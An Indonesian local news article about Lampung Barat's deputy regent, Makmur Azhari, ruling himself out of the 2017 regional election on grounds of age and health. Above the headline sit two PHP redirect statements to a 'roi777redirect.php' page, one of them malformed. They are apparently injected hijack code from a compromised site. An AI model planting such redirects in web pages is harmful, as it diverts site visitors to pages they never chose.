header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Makmur Azhari Pastikan tak Ikut Pilkada -
Makmur Azhari Pastikan tak Ikut Pilkada

translampung.com – Wakil Bupati Lampung Barat (Lambar) Makmur Azhari, pastikan diri tidak akan ikut dalam bursa Pemilihan Kepala Daerah 2017 mendatang. Meski diketahui, Makmur Azhari sempat mengambil formulir pendaftaran untuk bakal calon (balon) wakil bupati yang dibuka Dewan Pimpinan Cabang (DPC) Partai Demokrasi Indonesia-Perjuangan (PDIP) Lambar beberapa waktu lalu.

Masalah usia menjadi alasan Makmur Azhari mengurungkan niatnya maju pada pilkada mendatang. Usia yang memasuki 75 tahun dianggap cukup sulit untuk melakukan aktifitas seperti biasa. “Saya sudah tua, daya ingat dan pengeliatan kini menurun. Saya tidak akan maju di Pilkada mendatang,” kata Makmur Azhari Rabu (11/5).

Makmur mengatakan, memang pada pembukaan di DPC PDIP Lambar dirinya sempat mengambil dan mengembalikan formulir pendaftaran sebagai balon wakil bupati. Akan tetapi, lanjut Makmur, bahwa pengambilan formulir pendaftaran karena pada saat pembukaan sampai dengan tanggal penutupan pendaftaran di DPC PDIP tidak ada yang mengambil formulir. Sehingga saat itu dirinya memutuskan untuk mendaftarkan diri. “Sampai penutupan belum ada yang mendaftar. Sangat disayangkan partai sebesar itu untuk dilewatkan. Makanya saya mengambil formulir,” jelasnya.

Makmur juga mengatakan, meskipun ada partai yang meminangnya untuk mendampingi kadernya maju pilkada, dirinya akan memikirkan terlebih dahulu. Kembali ke alasan fisik yang dianggap kian melemah. “Nanti dulu, saya sudah tidak kuat fisik. Gejala flu saja sudah buat saya tidak bisa beraktifitas. Apa lagi yang lain,” ujarnya.

Dikatakan Makmur, terlepas sapa yang nanti akan maju dan memenangkan Pilkada Lambar diharapkan dapat mensejahterakan rakyat kelak. Sebab, keberhasilan pemerintah dilihat dari kesejahteraan masyarakatnya. Khususnya para petani. Sebab, Lambar tidak dipungkiri sebagian besar warganya adalah petani. (VP)

News Reporter

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.